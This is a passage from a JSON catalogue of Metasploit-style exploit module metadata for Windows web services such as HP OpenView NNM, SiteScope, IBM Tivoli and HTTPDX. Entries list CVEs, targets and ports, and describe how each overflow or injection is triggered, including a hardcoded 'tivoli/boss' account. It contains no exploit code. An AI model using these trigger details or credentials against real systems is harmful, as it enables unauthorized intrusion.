parsing function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010.\n\n Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n important to note that this vulnerability must be exploited by overwriting SEH. This is since\n overflowing the buffer with controllable data always triggers an access violation when\n attempting to write static text beyond the end of the stack.\n\n Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n arbitrary code execution, a double-backward jump is used in combination with the Alpha2\n encoder.", - "references": [ - "CVE-2010-1960", - "OSVDB-65427", - "BID-40637", - "ZDI-10-105" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 w/NNM_01206", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_uro", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_snmp": { - "name": "HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_snmp", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2009-3849", - "OSVDB-60933" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50 / Windows 2000 All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_snmp.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_snmp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_snmpviewer_actapp": { - "name": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_snmpviewer_actapp", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-05-11", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n code.\n\n The vulnerable code lies within a function within \"snmpviewer.exe\" with a\n timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n or POST request. The request must contain 'act' and 'app' parameters which, when\n combined, total more than the 1024 byte stack buffer can hold.\n\n It is important to note that this vulnerability must be exploited by overwriting SEH.\n While the saved return address can be smashed, a function call that occurs before\n the function returns calls \"exit\".", - "references": [ - "CVE-2010-1552", - "OSVDB-64975", - "BID-40068", - "ZDI-10-083", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 w/NNM_01201", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_snmpviewer_actapp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_toolbar_01": { - "name": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_toolbar_01", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-01-07", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2008-0067", - "OSVDB-53222", - "BID-33147" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50 / Windows 2000 All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_toolbar_01.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_toolbar_01", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_toolbar_02": { - "name": "HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_toolbar_02", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-21", - "type": "exploit", - "author": [ - "Oren Isacson", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0\n and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an\n attacker may be able to execute arbitrary code. Please note that this module only works\n against a specific build (i.e. NNM 7.53_01195)", - "references": [ - "CVE-2009-0920", - "OSVDB-53242", - "BID-34294", - "URL-http://www.coresecurity.com/content/openview-buffer-overflows" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "HP OpenView Network Node Manager Release B.07.00", - "HP OpenView Network Node Manager 7.53 Patch 01195" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_toolbar_02.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_toolbar_02", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_webappmon_execvp": { - "name": "HP OpenView Network Node Manager execvp_nc Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_webappmon_execvp", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-07-20", - "type": "exploit", - "author": [ - "Shahin Ramezany ", - "sinn3r ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is not triggerable via a GET request due to limitations on the\n request size. The buffer being targeted is 16384 bytes in size. There are actually two\n adjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by\n overwriting the saved return address or SEH frame.\n\n This vulnerability might also be triggerable via other CGI programs, however this was\n not fully investigated.", - "references": [ - "CVE-2010-2703", - "OSVDB-66514", - "BID-41829", - "ZDI-10-137", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "HP OpenView Network Node Manager 7.53 w/NNM_01206", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_webappmon_execvp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_webappmon_ovjavalocale": { - "name": "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_webappmon_ovjavalocale", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-08-03", - "type": "exploit", - "author": [ - "Nahuel Riva", - "sinn3r ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow\n a stack buffer and execute arbitrary code.\n\n The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is\n declared within this function. When the vulnerability is triggered, the stack trace looks\n like the following:\n\n #0 ...\n #1 sprintf_new(local_stack_buf, fmt, cookie);\n #2 OvWwwDebug(\" HTTP_COOKIE=%s\\n\", cookie);\n #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);\n #4 sub_405ee0(\"nnm\", \"webappmon\");\n\n No validation is done on the cookie argument. There are no stack cookies, so exploitation\n is easily achieved by overwriting the saved return address or SEH frame.\n\n The original advisory detailed an attack vector using the \"OvJavaLocale\" cookie being\n passed in a request to \"webappmon.exe\". Further research shows that several different\n cookie values, as well as several different CGI applications, can be used.\n '", - "references": [ - "CVE-2010-2709", - "OSVDB-66932", - "BID-42154", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520", - "URL-http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "HP OpenView Network Node Manager 7.53", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_webappmon_ovjavalocale", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_openview_insight_backdoor": { - "name": "HP OpenView Performance Insight Server Backdoor Account Code Execution", - "fullname": "exploit/windows/http/hp_openview_insight_backdoor", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-01-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n class. When using this account, an attacker can abuse the\n com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system\n allowing the execution of arbitrary code.\n\n NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0", - "references": [ - "CVE-2011-0276", - "OSVDB-70754" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Windows Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_openview_insight_backdoor.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_openview_insight_backdoor", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_pcm_snac_update_certificates": { - "name": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", - "fullname": "exploit/windows/http/hp_pcm_snac_update_certificates", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-09-09", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.", - "references": [ - "CVE-2013-4812", - "OSVDB-97155", - "BID-62348", - "ZDI-13-225" - ], - "platform": "Windows", - "arch": "java", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP ProCurve Manager 4.0 SNAC Server" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_pcm_snac_update_certificates", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_pcm_snac_update_domain": { - "name": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload", - "fullname": "exploit/windows/http/hp_pcm_snac_update_domain", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-09-09", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.", - "references": [ - "CVE-2013-4811", - "OSVDB-97154", - "BID-62349", - "ZDI-13-226" - ], - "platform": "Windows", - "arch": "java", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP ProCurve Manager 4.0 SNAC Server" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_pcm_snac_update_domain", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_power_manager_filename": { - "name": "HP Power Manager 'formExportDataLogs' Buffer Overflow", - "fullname": "exploit/windows/http/hp_power_manager_filename", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-10-19", - "type": "exploit", - "author": [ - "Alin Rad Pop", - "Rodrigo Escobar ", - "sinn3r " - ], - "description": "This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'.\n By creating a malformed request specifically for the fileName parameter, a stack-based\n buffer overflow occurs due to a long error message (which contains the fileName),\n which may result in arbitrary remote code execution under the context of 'SYSTEM'.", - "references": [ - "CVE-2009-3999", - "OSVDB-61848", - "BID-37867" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 / Win Server 2003 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_power_manager_filename.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_power_manager_filename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_power_manager_login": { - "name": "Hewlett-Packard Power Manager Administration Buffer Overflow", - "fullname": "exploit/windows/http/hp_power_manager_login", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-11-04", - "type": "exploit", - "author": [ - "MC ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.\n Sending a specially crafted POST request with an overly long Login string, an\n attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-2685", - "OSVDB-59684" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_power_manager_login.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_power_manager_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_sitescope_dns_tool": { - "name": "HP SiteScope DNS Tool Command Injection", - "fullname": "exploit/windows/http/hp_sitescope_dns_tool", - "aliases": [], - "rank": 400, - "disclosure_date": "2015-10-09", - "type": "exploit", - "author": [ - "Kirk Hayes", - "Charles Riggs", - "Juan Vazquez" - ], - "description": "This module exploits a command injection vulnerability\n discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n and 11.30). The vulnerability exists in the DNS Tool allowing an\n attacker to execute arbitrary commands in the context of the service. By\n default, HP SiteScope installs and runs as SYSTEM in Windows and does\n not require authentication. This vulnerability only exists on the\n Windows version. The Linux version is unaffected.", - "references": [ - "URL-https://www.rapid7.com/blog/post/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection", - "URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP SiteScope 11.30 / Microsoft Windows 7 and higher", - "HP SiteScope 11.30 / CMD" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_sitescope_dns_tool", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_sitescope_runomagentcommand": { - "name": "HP SiteScope Remote Code Execution", - "fullname": "exploit/windows/http/hp_sitescope_runomagentcommand", - "aliases": [], - "rank": 0, - "disclosure_date": "2013-07-29", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in HP SiteScope.\n The vulnerability exists in the opcactivate.vbs script, which\n is reachable from the APIBSMIntegrationImpl AXIS service, and\n uses WScript.Shell.run() to execute cmd.exe with user provided\n data. Note that the opcactivate.vbs component is installed\n with the (optional) HP Operations Agent component. The module\n has been tested successfully on HP SiteScope 11.20 (with HP\n Operations Agent) over Windows 2003 SP2.", - "references": [ - "CVE-2013-2367", - "OSVDB-95824", - "BID-61506", - "ZDI-13-205" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_sitescope_runomagentcommand", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hpe_sim_76_amf_deserialization": { - "name": "HPE Systems Insight Manager AMF Deserialization RCE", - "fullname": "exploit/windows/http/hpe_sim_76_amf_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-12-15", - "type": "exploit", - "author": [ - "Harrison Neal", - "Jang", - "Grant Willcox" - ], - "description": "A remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be\n leveraged by a remote unauthenticated attacker to execute code within the context of HPE System Insight\n Manager's hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due\n to a failure to validate data during the deserialization process when a user submits a POST request to\n the /simsearch/messagebroker/amfsecure page. This module exploits this vulnerability by leveraging an\n outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM, to gain\n RCE as the administrative user running HPE SIM.", - "references": [ - "CVE-2020-7200", - "URL-https://testbnull.medium.com/hpe-system-insight-manager-sim-amf-deserialization-lead-to-rce-cve-2020-7200-d49a9cf143c0", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-20-1449/", - "URL-https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us" - ], - "platform": "Windows", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/hpe_sim_76_amf_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/httpdx_handlepeer": { - "name": "HTTPDX h_handlepeer() Function Buffer Overflow", - "fullname": "exploit/windows/http/httpdx_handlepeer", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-10-08", - "type": "exploit", - "author": [ - "Pankaj Kohli ", - "Trancer ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The\n vulnerability is caused due to a boundary error within the \"h_handlepeer()\" function in http.cpp.\n By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.", - "references": [ - "OSVDB-58714", - "CVE-2009-3711", - "URL-http://www.pank4j.com/exploits/httpdxb0f.php", - "URL-http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "httpdx 1.4 - Windows XP SP3 English", - "httpdx 1.4 - Windows 2003 SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/httpdx_handlepeer.rb", - "is_install_path": true, - "ref_name": "windows/http/httpdx_handlepeer", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/httpdx_tolog_format": { - "name": "HTTPDX tolog() Function Format String Vulnerability", - "fullname": "exploit/windows/http/httpdx_tolog_format", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-11-17", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a format string vulnerability in HTTPDX HTTP server.\n By sending a specially crafted HTTP request containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.", - "references": [ - "CVE-2009-4769", - "OSVDB-60182" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "httpdx 1.4 - Windows XP SP3 English", - "httpdx 1.4.5 - Windows XP SP3 English", - "httpdx 1.4.6 - Windows XP SP3 English", - "httpdx 1.4.6b - Windows XP SP3 English", - "httpdx 1.5 - Windows XP SP3 English", - "Debug target" - ], - "mod_time": "2023-05-30 10:56:41 +0000", - "path": "/modules/exploits/windows/http/httpdx_tolog_format.rb", - "is_install_path": true, - "ref_name": "windows/http/httpdx_tolog_format", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ia_webmail": { - "name": "IA WebMail 3.x Buffer Overflow", - "fullname": "exploit/windows/http/ia_webmail", - "aliases": [], - "rank": 200, - "disclosure_date": "2003-11-03", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a stack buffer overflow in the IA WebMail server.\n This exploit has not been tested against a live system at\n this time.", - "references": [ - "CVE-2003-1192", - "OSVDB-2757", - "BID-8965", - "URL-http://www.k-otik.net/exploits/11.19.iawebmail.pl.php" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "IA WebMail 3.x" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ia_webmail.rb", - "is_install_path": true, - "ref_name": "windows/http/ia_webmail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ibm_tivoli_endpoint_bof": { - "name": "IBM Tivoli Endpoint Manager POST Query Buffer Overflow", - "fullname": "exploit/windows/http/ibm_tivoli_endpoint_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-05-31", - "type": "exploit", - "author": [ - "bannedit ", - "Jeremy Brown <0xjbrown@gmail.com>" - ], - "description": "This module exploits a stack based buffer overflow in the way IBM Tivoli\n Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query\n arguments.\n\n This issue can be triggered by sending a specially crafted HTTP POST request to\n the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization\n is required. This exploit makes use of a second vulnerability, a hardcoded account\n (tivoli/boss) is used to bypass the authorization restriction.", - "references": [ - "CVE-2011-1220", - "OSVDB-72713", - "OSVDB-72751", - "BID-48049", - "ZDI-11-169" - ], - "platform": "Windows", - "arch": "", - "rport": 9495, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows Server 2003 SP0", - "Windows Server 2003 SP1", - "Windows Server 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/ibm_tivoli_endpoint_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ibm_tpmfosd_overflow": { - "name": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", - "fullname": "exploit/windows/http/ibm_tpmfosd_overflow", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-05-02", - "type": "exploit", - "author": [ - "toto" - ], - "description": "This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n for OS Deployment version 5.1.0.X.", - "references": [ - "CVE-2007-1868", - "OSVDB-34678", - "BID-23264", - "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-05" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "TPMfOSD 5.1 (Windows 2000 SP4 - English)", - "TPMfOSD 5.1 (Windows 2003 All - English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/ibm_tpmfosd_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ibm_tsm_cad_header": { - "name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow", - "fullname": "exploit/windows/http/ibm_tsm_cad_header", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-09-24", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).\n By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.", - "references": [ - "CVE-2007-4880", - "OSVDB-38161", - "BID-25743" - ], - "platform": "Windows", - "arch": "", - "rport": 1581, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Tivoli Storage Manager Express 5.3.3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ibm_tsm_cad_header.rb", - "is_install_path": true, - "ref_name": "windows/http/ibm_tsm_cad_header", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/icecast_header": { - "name": "Icecast Header Overwrite", - "fullname": "exploit/windows/http/icecast_header", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-09-28", - "type": "exploit", - "author": [ - "spoonm ", - "Luigi Auriemma " - ], - "description": "This module exploits a buffer overflow in the header parsing of icecast\n versions 2.0.1 and earlier, discovered by Luigi Auriemma. Sending 32\n HTTP headers will cause a write one past the end of a pointer array. On\n win32 this happens to overwrite the saved instruction pointer, and on\n linux (depending on compiler, etc) this seems to generally overwrite\n nothing crucial (read not exploitable).\n\n This exploit uses ExitThread(), this will leave icecast thinking the\n thread is still in use, and the thread counter won't be decremented.\n This means for each time your payload exits, the counter will be left\n incremented, and eventually the threadpool limit will be maxed. So you\n can multihit, 